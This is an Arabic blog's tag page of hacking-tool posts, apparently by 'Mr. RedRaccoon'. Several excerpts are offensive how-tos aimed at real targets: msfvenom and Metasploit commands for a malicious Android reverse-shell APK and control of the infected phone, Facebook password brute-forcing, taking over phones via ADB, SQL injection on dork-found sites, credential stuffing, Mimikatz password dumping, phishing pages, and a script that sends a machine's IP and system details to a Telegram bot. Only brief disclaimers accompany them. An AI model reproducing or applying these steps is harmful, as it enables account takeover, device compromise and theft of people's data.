المشاركات

عرض الرسائل ذات التصنيف kali linux

أداتي RR29-V1: أداة شاملة للأمن السيبراني

صورة
  Mr. RedRaccoon RR29-V1 هي أداة متقدمة مصممة لتسهيل مهام الاختراق الأخلاقي و اختبار الاختراق . تتميز بواجهة مستخدم بسيطة وجذابة، وتصنيف الأدوات إلى فئات متعددة تشمل: OSINT : جمع المعلومات مفتوحة المصدر. تحليل الشبكات : فحص وتحليل حركة المرور والبنية التحتية. اختراق الويب : استهداف وفحص تطبيقات الويب. التصيد عبر وسائل التواصل الاجتماعي : إنشاء واختبار صفحات تصيد مخصصة. استكشاف الإنترنت المظلم : أدوات لاستكشاف أنشطة الإنترنت المظلم. أبرز الميزات: تنزيل تلقائي للمستودعات : تسهيل عملية الحصول على الأدوات المفتوحة المصدر. الكشف عن الملفات القابلة للتنفيذ : تحديد الملفات المناسبة للنظام. التوافق متعدد الأنظمة : تعمل على أنظمة تشغيل متعددة. تصميم جمالي وعملي : يجمع بين الأداء الوظيفي والجاذبية البصرية. تم تطوير الأداة بواسطتي ، مما يجعلها أداة أساسية لمحترفي الأمن السيبراني وهواة المجال على حدٍ سواء.   تحميل :  https://github.com/ibmrx/RR29-V1

أداة BadMod: أداة استغلال تلقائي للإصدارات القديمة

صورة
  Mr. RedRaccoon BadMod هي أداة استغلال تلقائي تستخدم لاكتشاف واستغلال الثغرات في مواقع الإنترنت مثل Joomla و WordPress، وهي مفيدة في اختبار أمان المواقع. تأتي النسخة 2.0 مع إصلاحات وإضافات جديدة. الميزات في النسخة 2.0: إصلاح مشكلة الألوان. إصلاح مشكلة الأذونات. إضافة خيار جديد لفحص هدف محدد. إضافة خيار جديد لفحص إضافات Joomla و WordPress . التثبيت: لتثبيت الأداة على نظام Linux ، اتبع الخطوات التالية: استنساخ الأداة: git clone https://github.com/MrSqar-Ye/BadMod.git $ تثبيت لغة PHP : sudo apt-get install php $ تثبيت مكتبة php-curl : sudo apt-get install php-curl $

أداة Cross Site Scripter (XSSer): اكتشاف واستغلال ثغرات XSS تلقائيًا

صورة
  Mr. RedRaccoon XSSer هي إطار عمل أوتوماتيكي مصمم لاكتشاف واستغلال ثغرات XSS (Cross-Site Scripting) في التطبيقات الويب، بالإضافة إلى تقديم تقارير حولها. تتيح الأداة العديد من الخيارات لتجاوز الفلاتر الأمنية باستخدام تقنيات حقن كود خاصة. الميزات: تحتوي على أكثر من 1300 نوع من متجهات الهجوم المخصصة لـ XSS. القدرة على تجاوز واستغلال الكود على عدة متصفحات وجدران حماية للتطبيقات (WAFs) مثل: PHPIDS : PHP-IDS Imperva : Imperva Incapsula WAF WebKnight : WebKnight WAF F5 : F5 Big IP WAF Barracuda : Barracuda WAF ModSec : Mod-Security QuickDF : QuickDefense Sucuri : SucuriWAF Chrome : متصفح Google Chrome IE : Internet Explorer Firefox : متصفح Firefox Netscape : Netscape مع وضعية عرض IE وGecko Opera : متصفح Opera التثبيت: لتشغيل XSSer، تحتاج إلى Python (إصدار 3.x) وبعض المكتبات المطلوبة. على أنظمة Debian مثل Ubuntu : bsudo apt-get install python3-pycurl python3-bs4 python3-geoip python3-gi python3-cairocffi python3-selenium firefoxdriver على أنظمة أخرى مثل Kali, Ubuntu, ArchLinux, ParrotSe...

أداة Saintgram: استخراج معلومات حسابات Instagram بسهولة

صورة
Mr. RedRaccoon Saintgram هي أداة مكتوبة بلغة Python مصممة لاستخراج معلومات حسابات Instagram، بما في ذلك البريد الإلكتروني المشفر وأرقام الهواتف، بالإضافة إلى قوائم المتابعين والمتابَعين. الميزات: استرجاع معلومات الحساب الأساسية مثل اسم المستخدم، المعرف، وعدد المتابعين. استخراج البريد الإلكتروني المشفر وأرقام الهواتف. عرض قوائم المتابعين والمتابَعين مع معلومات الاتصال. تدعم واجهة سطر الأوامر لتسهيل الاستخدام. التثبيت: لتثبيت الأداة، اتبع الخطوات التالية: استنساخ المستودع: git clone https://github.com/joe444-pnj/saintgram.git $ $ cd saintgram تثبيت الحزم المطلوبة: pip install -r requirements.txt $ python main.py $ To Retrieve The Session ID

هجوم Credential Stuffing بأداة Cr3dOv3r: كيفية كشف واستخدام بيانات الاعتماد المسروقة

صورة
Mr.  RedRaccoon ما هو Credential Stuffing Credential Stuffing هو هجوم إلكتروني يستخدمه المتسللون للوصول إلى الحسابات باستخدام بيانات اعتماد مسروقة. يعتمد الهجوم على أدوات تلقائية تقوم بمحاولة تسجيل الدخول إلى حسابات باستخدام كلمات مرور أو بيانات مسربة. خطوات الهجوم: التحقق مما إذا كان البريد الإلكتروني المستهدف قد تسربت بياناته ، ثم يتم استخدام كلمة المرور المسربة للتحقق من صحة الدخول إلى المواقع. التحقق مما إذا كانت بيانات الاعتماد المستخدمة على مواقع أخرى ، وذلك لفحص إمكانية إعادة استخدام نفس كلمة المرور. التحقق مما إذا كانت كلمة المرور القديمة المسربة ما زالت مستخدمة في أي موقع آخر. أداة Cr3dOv3r Cr3dOv3r هي أداة مفتوحة المصدر مصممة للمساعدة في تنفيذ مثل هذه الفحوصات. رابط المشروع: Cr3dOv3r على GitHub كيفية الاستخدام يمكن استخدام الأداة للتحقق من البريد الإلكتروني أو اسم المستخدم: usage: Cr3d0v3r.py [-h] [-p] [-np] [-q] email email : البريد الإلكتروني أو اسم المستخدم للتحقق منه. الخيارات الإضافية: -h, --help : عرض المساعدة والخروج. -p : لا تتحقق من التسريبات أو كلمات المرور بال...

مرحبًا بك في SubnetWizard - أداة حساب الشبكات الشاملة

صورة
Mr.  RedRaccoon إذا كنت مسؤول شبكة أو مهتمًا بالتكنولوجيا، فإن SubnetWizard هو الخيار المثالي لك لحساب الشبكات والأشباه. سواء كنت تبحث عن حساب الشبكات الفرعية أو الشبكات العلوية، توفر لك SubnetWizard أدوات بسيطة وفعالة لإنجاز المهام بكل سهولة. تحقق دائمًا من الكود المشفر قبل التثبيت أو لا تقم بالتثبيت على الإطلاق! رابط المشروع: SubnetWizard على GitHub الميزات حساب الشبكات الفرعية لأي شبكة بسهولة. حساب الشبكات العلوية بدقة. الحصول على معلومات قيمة حول عناوين IPv4. متوافق مع بيئات Linux وWindows. واجهة سطر أوامر سهلة الاستخدام للتنقل السلس. يستخدم وحدة ipaddress في Python لضمان الدقة. يعمل مع Python 3.10.5 والإصدارات الأحدث. المتطلبات Python 3.10.5 أو إصدار أحدث. دليل المستخدم التثبيت استنساخ المستودع: $ git clone https://github.com/naemazam/SubnetWizard.git الانتقال إلى الدليل: $ cd SubnetWizard الاستخدام تشغيل الأداة: على Linux: $ python3 main.py على Windows: $ python main.py يمكنك أيضًا استخدام مفاتيح المعلمات: -i لتحديد عنوان IP للشبكة الفرعية/العليا. -s لتحديد قناع الشبكة (ب...

مشروع AngryOxide: أداة لاكتشاف ثغرات الأمان في الشبكات

صورة
Mr.  RedRaccoon شرح المشروع: الهدف: AngryOxide هي أداة مصممة لمساعدة مسؤولي الشبكات في اكتشاف الثغرات والمشاكل الأمنية في الأنظمة الخاصة بهم. الأداة تهدف إلى التعرف على المنافذ المفتوحة والخدمات التي قد تكون معرضة للاختراق. الوظائف: تقوم الأداة بإجراء مسح شامل للشبكة لتحديد الأجهزة المتصلة. تفحص المنافذ المفتوحة على كل جهاز وتحدد الخدمات التي تعمل على هذه المنافذ. التكنولوجيا: AngryOxide مكتوبة بلغة Rust ، المعروفة بسرعتها وأمانها، مما يجعل الأداة سريعة وفعالة في تحليل الشبكات واكتشاف الثغرات. مدى خطورة استعمالها من قبل الهكرز: استخدام مشروع: في الاستخدام العادي، يُستخدم المشروع بواسطة مديري الشبكات وخبراء الأمان لتحسين أمان الأنظمة وإصلاح الثغرات المحتملة. استخدام غير مشروع: إذا وقع المشروع في يد الهكرز، يمكنهم استخدامه لاكتشاف الثغرات في شبكات أخرى واستغلالها للاختراق وسرقة البيانات أو تخريب الأنظمة. رابط المشروع: AngryOxide على GitHub

ميمي كاتز (Mimikatz): أداة قوية لفحص واختراق الأنظمة

صورة
  Mr.  RedRaccoon ميمي كاتز هي أداة متقدمة في مجال الهكر والتجسس على الأنظمة، وقد تم تطويرها لمساعدة المحققين الرقميين والباحثين في الأمن السيبراني لاستخراج معلومات حساسة من الأنظمة. أنشأها الباحث الأمني الفرنسي بنيامين ديلبي في عام 2011. تستخدم الأداة لاستغلال الثغرات في أنظمة ويندوز لسحب كلمات المرور والمعلومات الحساسة من ذاكرة النظام. الأوامر والوظائف الرئيسية لأداة ميمي كاتز: privilege::debug يشغل صلاحيات التصحيح في النظام، مما يمنح الهكر القدرة على التحكم الكامل في النظام. sekurlsa::logonpasswords يستخرج كلمات المرور المخزنة في النظام، مما يسهل الحصول على كلمات المرور بدون جهد كبير. sekurlsa::tickets يعرض تذاكر Kerberos المخزنة في النظام، مما يساعد في الاستيلاء على الجلسات الحالية للوصول إلى الموارد دون إعادة المصادقة. lsadump::sam يفريغ ملفات SAM التي تحتوي على كلمات مرور المستخدمين في النظام، مما يسمح بإعادة استخدام كلمات المرور في هجمات أخرى. lsadump::secrets يظهر الأسرار المخزنة في النظام، مما يساعد في الوصول لمعلومات حساسة. token::elevate يحاول رفع الصلاحيات في النظا...

أداة RHG للهندسة الاجتماعية: اختبار اختراق الحسابات عبر تقنيات الهندسة الاجتماعية

صورة
Mr.  RedRaccoon 🔒 أداة RHG لاختراق الحسابات عبر الهندسة الاجتماعية 🔒 مقدمة : الهندسة الاجتماعية تُعد من أخطر الأساليب المستخدمة في اختراق الحسابات، حيث يتم خداع الأفراد للوصول إلى معلومات حساسة. أداة RHG مصممة لتوفير بيئة اختبار لأمان الحسابات باستخدام تقنيات الهندسة الاجتماعية، مما يتيح للمختصين اكتشاف الثغرات وسدها. أهمية الأداة : تم تطوير أداة RHG من قبل مختصين في الأمن السيبراني لمساعدة الباحثين ومسؤولي الأمان في محاكاة هجمات الهندسة الاجتماعية لتحديد نقاط الضعف وتحسين الحماية ضد هذا النوع من التهديدات. خطوات تثبيت واستخدام أداة RHG: تحديث الحزم الأساسية : قبل البدء، تأكد من تحديث الحزم الأساسية في نظام Termux: $ pkg update && pkg upgrade $ pkg install git $ pkg install python2 تحميل أداة RHG : لتحميل الأداة، استخدم الأمر التالي: $ git clone https://github.com/RAYANEHACKER/RHG_T.git الولوج إلى مجلد الأداة : بعد التحميل، ادخل إلى مجلد الأداة باستخدام الأوامر التالية: $ cd RHG_T $ chmod +x * $ python2 RHG.pyc فحص الأدوات المفقودة : لتثبيت الأدوات اللازمة للعمل بشكل...

دليل تثبيت Kali Linux على الأندرويد باستخدام UserLand

صورة
Mr.  RedRaccoon السلام عليكم ، في هذا الدليل سنوضح خطوات تثبيت Kali Linux على هاتفك الأندرويد باستخدام تطبيق UserLand . هذه الطريقة ليست نسخة كاملة من Kali Linux بواجهة المستخدم الأصلية، لكنها تعمل عبر Termux وتتيح لك الوصول إلى بيئة Kali Linux للعمل بشكل مشابه. تابع الخطوات التالية: الخطوة الأولى: تحميل تطبيق UserLand افتح متجر التطبيقات على هاتفك. ابحث عن تطبيق اسمه "UserLand" وقم بتنزيله وتثبيته. الخطوة الثانية: تثبيت UserLand بمجرد تحميل التطبيق، قم بتثبيته على جهازك. الخطوة الثالثة: إعداد Kali Linux بعد التثبيت، افتح تطبيق UserLand . انتظر حتى يتم تنزيل جميع الحزم المطلوبة. عند الانتهاء، اضغط على زر Kali في التطبيق. سيطلب منك إدخال اسم مستخدم وكلمة مرور. قم بتعيين أي اسم مستخدم وكلمة مرور تفضلها، ولكن تأكد من تذكرها. اضغط OK وانتظر حتى يتم التثبيت، يعتمد وقت التثبيت على سرعة الإنترنت وقد يستغرق حوالي 20 دقيقة. الخطوة الرابعة: تسجيل الدخول بعد التثبيت، سيظهر لك اسم المستخدم الذي اخترته. أدخل كلمة المرور التي قمت بتعيينها في الخطوة السابقة، وهكذا سيكون Kali Linux جاهز...

استخدام أداة RHG في تثبيت متطلبات Termux دفعة واحدة

صورة
Mr.  RedRaccoon الخطوة الأولى: تثبيت Termux قم بتثبيت تطبيق Termux من متجر التطبيقات على جهاز الأندرويد الخاص بك. يمكنك أيضًا استخدام توزيعات Linux مثل Kali Linux إذا كنت تفضل العمل على نظام تشغيل آخر. الخطوة الثانية: تثبيت الأدوات على Termux أو Linux افتح تطبيق Termux أو واجهة سطر الأوامر في توزيعة Linux الخاصة بك. نفّذ الأوامر التالية لتحديث الحزم وتثبيت الأدوات: $ apt update && apt upgrade $ pkg install python $ git clone https://github.com/Ledear-Hacker/RHG $ cd RHG $ ls $ chmod +x * $ python2 RHG.py الخطوة الثالثة: إعداد الأداة بعد الدخول إلى الأداة، اختر الخيار 1 لتثبيت جميع الأدوات دفعة واحدة بسهولة وبدون مشاكل. ملحوظة : تأكد من أنك تستخدم هذه الأدوات فقط لأغراض تعليمية وبحوث الأمن السيبراني، ويجب تجنب استخدامها لأي نشاط غير مشروع.

سكربت بسيط لجمع المعلومات باستخدام بايثون

صورة
Mr.  RedRaccoon آلية عمل السكربت: استيراد المكتبات: يتم استيراد المكتبات اللازمة مثل os , sys , platform , socket , requests , و datetime . تعريف المتغيرات: TOKEN : رمز البوت الخاص بك على تيليجرام. ID : معرف تيليجرام الخاص بك. OS_Name : اسم نظام التشغيل. OS_Version : إصدار نظام التشغيل. Path : المسار الحالي. Time : الوقت الحالي. Ip : عنوان IP للجهاز. host : اسم المضيف. Dev : اسم المطور (يمكن تغييره). TOKEN = "Your BOT Token" ID = "Your Telegram Id" OS_Name = platform.system() OS_Version = platform.release() Path = sys.path[ 0 ] Time = str (datetime.now()) Ip = requests.get( "https://api.ipify.org" ).text host = socket.gethostbyname(socket.gethostname()) Dev = "@MrRedRaccon" إرسال المعلومات إلى تيليجرام: يتم إنشاء رابط لإرسال رسائل تيليجرام باستخدام TOKEN ، ويتم إنشاء قاموس يحتوي على معلومات حول نظام التشغيل والجهاز والوقت والمسار الحالي. يتم إرسال هذه المعلومات إلى حساب تيليجرام باستخدام API من خلال طلب POST. Url = "https://api.telegram.org/...

كيفية اختراق هاتف متصل بنفس الشبكة باستخدام Termux

صورة
Mr.  RedRaccoon الخطوة الأولى: تثبيت Termux قم بتثبيت تطبيق Termux من متجر Google Play أو من أي مصدر موثوق لتطبيقات Android. الخطوة الثانية: تثبيت الأدوات اللازمة تثبيت Termux-ADB: افتح Termux وأدخل الأوامر التالية: $ git clone https://github.com/MasterDevX/Termux-ADB $ ls $ cd Termux-ADB $ ls $ chmod +x * $ ./InstallTools.sh تثبيت PhoneSploit: افتح نافذة جديدة في Termux وأدخل الأوامر التالية: $ git clone https://github.com/Zucccs/PhoneSploit $ cd PhoneSploit $ chmod +x * $ pip2 install colorama $ python2 main_linux.py باتباع هذه الخطوات، يمكنك إعداد الأدوات اللازمة لاختراق الهاتف المتصل بنفس الشبكة. تأكد من استخدام هذه الأدوات لأغراض تعليمية وأخلاقية فقط.

كيفية اختراق موقع ويب باستخدام Termux

صورة
Mr.  RedRaccoon الخطوة الأولى: تحديث النظام وتثبيت الأدوات اللازمة تحديث النظام وتثبيت الأدوات: افتح Termux وأدخل الأوامر التالية: $ apt update && apt upgrade $ pkg install python2 $ pkg install git تثبيت Termux-LazySQLMap: أدخل الأوامر التالية لتثبيت الأداة: $ git clone https://github.com/verluchie/termux-lazysqlmap $ cd termux-lazysqlmap $ chmod 777 install.sh $ ./install.sh الخطوة الثانية: استخدام Google Dorks للعثور على مواقع الويب استخدم Google Dorks للعثور على مواقع الويب الضعيفة التي يمكنك اختبارها. (لمزيد من المعلومات حول Google Dorks، يمكنك البحث عن كيفية استخدامها). الخطوة الثالثة: تنفيذ الاختراق باستخدام Termux-LazySQLMap تشغيل الأداة: بعد تثبيت Termux-LazySQLMap، ابدأ الأداة بكتابة الأمر التالي في Termux: $ lazysqlmap اختيار الموقع المستهدف: أدخل عنوان الموقع الذي تريد اختراقه عندما يُطلب منك ذلك. اختيار خيارات التحقق: اختر الخيار المناسب لك. على سبيل المثال، اختر الخيار الذي يعود بالجداول في قاعدة البيانات. استرجاع الجداول: استخدم الأمر sitedb لاسترجاع الجد...

كيفية إنشاء Payload ملغم واستخدام Metasploit

صورة
Mr.  RedRaccoon 1. إنشاء Payload ملغم باستخدام msfvenom: افتح Termux أو أي بيئة تشغيل تتيح لك تنفيذ الأوامر، ثم استخدم الأمر التالي لإنشاء Payload ملغم: msfvenom -p android/meterpreter/reverse_tcp LHOST=(Your IP) LPORT=(Your Port) R > /sdcard/termux.apk استبدل (Your IP) بعنوان IP الخاص بك. استبدل (Your Port) بالمنفذ الذي ترغب في استخدامه. 2. فتح Metasploit: بعد إنشاء الـ Payload، افتح Metasploit باستخدام الأمر: ./msfconsole 3. إعداد Metasploit لاستقبال الـ Payload: في Metasploit، اتبع الأوامر التالية: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost (Your IP) set lport (Your Port) run استبدل (Your IP) بعنوان IP الخاص بك. استبدل (Your Port) بالمنفذ الذي اخترته. 4. استخدام Metasploit للتحكم بالجهاز المخترق: بمجرد اتصال الـ Payload بالجهاز، يمكنك استخدام الأوامر التالية للتحكم بالجهاز: help # عرض قائمة بالأوامر المتاحة shell # فتح قشرة النظام (Shell) cd /sdcard # تغيير الدليل إلى /sdcard ls # عرض محتويات الدليل ...

كيفية اختراق حساب فيسبوك باستخدام Termux

صورة
Mr.  RedRaccoon ملاحظة: يجب أن تكون على علم بأن استخدام الأدوات والبرمجيات لاختراق الحسابات بدون إذن هو غير قانوني وغير أخلاقي. الهدف من هذا الشرح هو توضيح كيفية عمل الأدوات لأغراض تعليمية فقط. يجب عليك دائمًا احترام خصوصية الآخرين والامتثال للقوانين المحلية. إليك خطوات استخدام Termux لاختراق حساب فيسبوك عبر التخمين: تحديث النظام وتثبيت الأدوات الأساسية: افتح Termux واستخدم الأوامر التالية لتحديث النظام وتثبيت الأدوات المطلوبة: apt update && apt upgrade $ $ pkg install git $ pkg install python $ pkg install python2 تثبيت سكربت التخمين: قم بتحميل السكربت من GitHub باستخدام الأوامر التالية: $git clone https://github.com/hackermohamedPro/Aliens-fb $ $ cd Aliens-fb $ pip2 install mechanize إنشاء قائمة كلمات المرور: قم بتشغيل السكربت لإنشاء قائمة كلمات مرور: $python Aliens-list.py عند تشغيل السكربت، سيُطلب منك إدخال اسم لقائمة كلمات المرور، تأكد من استخدام تنسيق .txt مثل passwords.txt . املأ القائمة بكلمات المرور المحتملة، ثم اكتب Pro واضغط على Enter . تشغيل أداة التخمين: ...

أداة NucleiScanner

صورة
Mr.  RedRaccoon NucleiScanner هي أداة أتمتة تجمع بين وظائف Nuclei، Subfinder، Gauplus، Paramspider و httpx لتعزيز اختبار أما تطبيقات الويب. تستخدم Subfinder لجمع أسماء النطاقات الفرعية، وGauplus لجمع عناوين URL وتصفيتها، وParamSpider لتحديد نقاط الدخول المحتملة، وأخيرًا تستخدم Nuclei لعمل مسح باستخدام القوالب للكشف عن الثغرات الأمنية. تهدف NucleiScanner إلى تبسيط العملية، مما يجعلها أسهل بالنسبة للمتخصصين في الأمان ومطوري الويب للكشف عن المخاطر الأمنية ومعالجتها بكفاءة. قم بتحميل NucleiScanner لحماية تطبيقات الويب الخاصة بك من الثغرات والهجمات. رابط تحميل:  NucleiScanner: GitHub - NucleiScanner

طريقة تثبيت NetHunter على Termux في أندرويد بدون روت

صورة
Mr.  RedRaccoon الخطوات الأساسية: تحميل Termux: قم بتحميل Termux من الرابط التالي: تحميل Termux إعداد Termux وتثبيت NetHunter: افتح تطبيق Termux واكتب الأوامر التالية: إعداد التخزين: $ termux-setup-storage تثبيت أداة wget: $ pkg install wget تنزيل سكربت التثبيت: $ wget -O install-nethunter-termux https://offs.ec/2MceZWr منح الأذونات للسكربت: $ chmod +x install-nethunter-termux تشغيل السكربت لتثبيت NetHunter: $ ./install-nethunter-termux قد تستغرق هذه العملية بعض الوقت، لذا انتظر حتى تنتهي. لتشغيل NetHunter: $ nethunter إذا أردت إغلاق واجهة سطر الأوامر لاحقاً، اكتب الأمر exit . تشغيل الواجهة الرسومية (GUI): لتشغيل الواجهة الرسومية، اتبع الخطوات التالية: إعداد كلمة المرور لـ VNC: $ nethunter kex passwd اختر كلمة مرور ولا تنساها، لأنك ستحتاجها في الخطوة التالية. بدء خادم Kex: $ nethunter kex & احتفظ بالقيمة التي تظهر بعد هذا الأمر، حيث ستحتاجها في الخطوة التالية. إذا أردت إيقاف الواجهة الرسومية لاحقاً، اكتب الأمر nethunter kex stop . تحميل وتشغيل تطبيق NetHunter Store: قم بت...

تعريف كالي لينكس وبرمجياته

صورة
Mr.  RedRaccoon كالي لينكس (Kali Linux) هي توزيعة لينكس مبنية على ديبيان، ومخصصة بشكل رئيسي للأمن والحماية المعلوماتية واختبار الاختراق. تم الإعلان عن إصدارها الأول في 13 مارس 2013. تُعتبر كالي لينكس أداة قوية في مجال الأمن السيبراني وتستخدم على نطاق واسع من قبل المحترفين في هذا المجال. أدوات كالي لينكس: تحتوي توزيعة كالي لينكس على مجموعة واسعة من الأدوات المخصصة لاختبار الاختراق والأمن السيبراني، ومن بين هذه الأدوات: Nmap: أداة قوية للمسح الأمني للمنافذ. Wireshark: برنامج لتحليل الحزم المتبادلة على الشبكات. John the Ripper: أداة لكسر كلمات المرور. Aircrack-ng: طقم برامج لاختبار اختراق الشبكات المحلية اللاسلكية (Wireless LANs). Burp Suite: أداة لفحص سلامة تطبيقات الويب. OWASP ZAP: أداة لفحص أمان تطبيقات الويب. بالإضافة إلى العديد من الأدوات الأخرى التي تساعد في إجراء اختبارات أمنية متعددة. برمجيات كالي لينكس: برمجيات حرة ومفتوحة المصدر: كالي لينكس تضم برمجيات حرة ومفتوحة المصدر تتوافق مع مبادئ البرمجيات الحرة. التثبيت والتشغيل: يمكن للمستخدمين تشغيل كالي لينكس كقرص حي (Liv...

كيفية تثبيت أداة Pocsuite3

صورة
Mr.  RedRaccoon 1. التحقق من تثبيت Python: تأكد من أن Python مثبت على جهازك قبل البدء في تثبيت الأداة. 2. استخدام بيئة افتراضية (Virtualenv): يُفضل استخدام بيئة افتراضية للحفاظ على بيئة Python منفصلة وتجنب تعارضات الحزم. تثبيت Virtualenv: $ pip install virtualenv 3. إنشاء بيئة افتراضية جديدة: يمكنك إنشاء بيئة افتراضية باسم تريده: $ virtualenv pocsuite يمكنك استبدال pocsuite بأي اسم تختاره. 4. تنشيط البيئة الافتراضية: لنظام Windows: $ pocsuite\Scripts\activate لنظام Linux/Mac: $ source pocsuite/bin/activate بعد تنفيذ الأمر المناسب لنظامك، ستلاحظ أن البيئة قد تم تفعيلها بنجاح. 5. تثبيت Pocsuite3: قم بتثبيت الأداة باستخدام pip: $ pip install pocsuite3 ستقوم هذه العملية بتحميل وتثبيت Pocsuite3 وجميع المكتبات المطلوبة تلقائيًا. 6. بدء استخدام Pocsuite3: لاختبار أحد تطبيقات الويب، استخدم الأمر التالي: $ pocsuite -r [poc_file] -u [url] استبدل [poc_file] بمسار ملف الـ POC الخاص بك و [url] بعنوان الهدف الذي تريد اختباره. شرح الأداة: لمزيد من المعلومات حول استخدام الأداة، يمكنك مشاهدة ال...